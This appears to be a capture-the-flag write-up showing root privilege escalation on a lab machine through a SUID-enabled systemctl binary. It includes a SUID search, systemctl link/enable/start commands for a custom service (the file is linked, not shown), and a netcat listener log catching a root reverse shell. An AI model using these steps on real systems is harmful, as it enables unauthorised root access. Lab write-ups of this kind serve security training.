Systemctl (suid enabled) privilege escalation Link to heading

Link to heading

Sceanrio: We have initial shell and during the checks we have found a systemctl file is enabled with SUID bit. refer below:

find / -perm -u=s -type f 2>/dev/null
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device

As per checking GTFO site, its says as below

systemctl

I have created a simple service and run with “systemctl “command.

The simple [service](Rchitect/root.service at Yoda · tcprks/Rchitect · GitHub) file as follows.

Now run these commands to run this custom service we created.

/bin/systemctl link /home/pepper/root.service
/bin/systemctl enable --now root.service
/bin/systemctl start root.service

We have done privilege escalation to root now.

└─$ rlwrap nc -nvlp 2222
listening on [any] 2222 ...

connect to [10.10.14.3] from (UNKNOWN) [10.10.10.143] 56496
python -c 'import pty; pty.spawn("/bin/bash")'
whoami
whoami
root